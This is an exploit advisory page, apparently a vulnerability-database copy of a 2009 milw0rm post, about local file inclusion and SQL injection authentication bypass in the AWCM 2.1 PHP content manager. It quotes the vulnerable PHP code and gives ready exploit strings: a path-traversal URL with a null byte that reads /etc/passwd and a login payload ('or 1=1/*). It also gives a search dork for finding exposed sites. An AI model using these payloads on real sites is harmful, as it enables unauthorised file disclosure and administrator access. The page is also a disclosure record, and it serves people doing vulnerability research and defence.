AWCM 2.1 - Local File Inclusion / Authentication Bypass
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2009-3218 | 23 Jul 200900:00 | – | circl | |
| CVE-2009-3219 | 23 Jul 200900:00 | – | circl | |
| CVE-2009-3218 | 16 Sep 200919:00 | – | cve | |
| CVE-2009-3219 | 16 Sep 200919:00 | – | cve | |
| CVE-2009-3218 | 16 Sep 200919:00 | – | cvelist | |
| CVE-2009-3219 | 16 Sep 200919:00 | – | cvelist | |
| EUVD-2009-3201 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2009-3202 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-3218 | 16 Sep 200919:30 | – | nvd | |
| CVE-2009-3219 | 16 Sep 200919:30 | – | nvd |
10
---------------------------------AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities---------------------------------------
#
# #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ######
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # #
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #
#### # # #### # # ###### # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # ## # # # # # # # ## # #
## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ###
#----------------------------------------------------------------------------------------------------------------
Script : AWCM
version : v2.1
Language:PHP
Demo : http://awcm.sourceforge.net/
Download : http://awcm.sourceforge.net/ar/down_pro.php?id=30
Dork: intext:Powered by AWCM v2.1
Found by :SwEET-DeViL
need magic_quotes_gpc = Off
#----------------------------------------------------------------------------------------------------------------
::: Local File Disclosure Vulnerability :::
)=> a.php
.................................................................................................................
if (isset($_GET['a'])) {
$a = $_GET['a']; <======================================:{
if (file_exists("addons/$a/index.php")) {
include ("addons/$a/index.php");
}
.................................................................................................................
#Exploit:
http://www.site.com/a.php?a=../../../../../../../../etc/passwd%00
##############################################################################
::: Auth Bypass SQL Injection Vulnerability :::
)=> login.php AND control/login.php
.................................................................................................................
if(isset($_GET['do'])) {
$user = $_POST['username']; <======================================:{
$pass = md5($_POST['password']);
$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
.................................................................................................................
#Exploit:
put as username : 'or 1=1/*
##############################################################################
www.arab4services.net
/---------------------------------------------------\
|+------------------------------------------------+ |
|| SwEET-DeViL & viP HaCkEr | |
|| gamr-14(at)hotmail.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/
# milw0rm.com [2009-07-23]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Jul 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0407